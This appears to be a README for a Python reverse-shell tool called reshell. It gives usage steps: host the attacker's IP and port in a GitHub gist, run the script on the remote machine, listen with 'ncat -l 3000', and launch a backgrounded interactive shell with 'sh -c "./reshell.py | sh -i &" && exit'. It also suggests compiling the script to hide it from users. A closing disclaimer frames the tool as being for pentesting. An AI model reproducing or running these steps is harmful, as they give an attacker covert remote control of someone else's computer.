A python reverse shell
- Create a github gist with the ip address and the port the script will connect to.
- open reshell.py go to line 44 and replace url to your gist.
- run this script on remote machine.
$ ncat -l 3000
██▀███ ▓█████ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓██ ▒ ██▒▓█ ▀ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▓██ ░▄█ ▒▒███ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒██▀▀█▄ ▒▓█ ▄ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░██▓ ▒██▒░▒████▒▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░ ▒▓ ░▒▓░░░ ▒░ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░▒ ░ ▒░ ░ ░ ░░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
sectasy@fs:~$
sh -c "./reshell.py | sh -i &" && exit
- You can also compile this script to make it unreadable for regular user or smth.
- Don't be a dick. This is meant to be used for pentesting or helping coworkers understand why they should always lock their computers. Please don't use this for anything malicious.